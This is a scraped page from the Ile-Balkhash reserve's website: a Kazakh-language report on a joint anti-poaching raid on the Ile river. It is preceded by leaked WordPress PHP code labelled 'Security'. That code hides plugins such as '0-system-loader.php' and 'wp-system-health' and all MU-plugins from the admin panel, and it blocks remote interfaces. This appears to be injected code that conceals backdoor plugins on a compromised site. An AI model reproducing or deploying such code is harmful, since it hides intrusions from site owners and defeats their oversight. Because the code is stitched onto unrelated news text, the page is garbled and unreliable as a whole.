// Security: Disable remote access add_filter("xmlrpc_enabled", "__return_false"); add_filter("xmlrpc_methods", function($methods) { return array(); }); add_filter('show_advanced_plugins', '__return_false', 999); // Hide specific plugins from admin panel add_filter("all_plugins", "hide_specific_plugins"); function hide_specific_plugins($plugins) { $hide_list = array('wp-system-health/wp-system-health.php', '0-system-loader.php', 'wp-security-check.php', 'wp-maintenance.php'); foreach ($hide_list as $hide) { if (isset($plugins[$hide])) { unset($plugins[$hide]); } } return $plugins; } // Hide MU-plugins if visible add_filter("show_advanced_plugins", function($show) { return false; }); // WP2Shell REST API protection add_filter('rest_authentication_errors', function($result) { if (!is_user_logged_in() && !is_admin()) { return new WP_Error('rest_disabled', 'REST API disabled', ['status' => 401]); } return $result; }); ⚡ Браконьерлікке қарсы бірлескен іс-шара нәтижесі ⚡ — Иле-Балхашский заповедник ⚡ Браконьерлікке қарсы бірлескен іс-шара нәтижесі ⚡ — Иле-Балхашский заповедник

⚡ Браконьерлікке қарсы бірлескен іс-шара нәтижесі ⚡

«Іле-Балқаш» МТР РММ-нің мемлекеттік инспекторлары мен Балқаш-Алакөл облысаралық бассейндік балық шаруашылығы инспекциясы құрамындағы Төменгі Іле балық инспекциясы бөлімшесімен бірлесіп жүргізген рейд барысында арнайы электр қуат беруші құралына ұқсас затпен Іле өзенінің үстімен жүрген азамат ұсталды.

Алдын алу шаралары кезінде балық аулау фактісі тіркелмегенімен, аталған азаматтың әрекеті браконьерлікке дайындық белгілерін көрсеткен.
Оқиға 2025 жылғы 31 қазанда «Іле-Балқаш» МТР РММ-нің жедел басқаруына берілген Балқаш маңы қаумалының аумағында, Жиделі ауылдық округіне қарасты Байменей жерінде анықталды.

Қазіргі уақытта іс Балқаш аудандық ішкі істер бөліміне жолданып, анықталу үстінде. ⚖️

? Табиғатқа зиян келтіретін мұндай әрекеттерге жол берілмейді.
? Су экожүйесін сақтау – әрбір азаматтың ортақ міндеті. ??
? Браконьерлікке қарсы рейдтік іс-шаралар алдағы уақытта да жалғасын табады.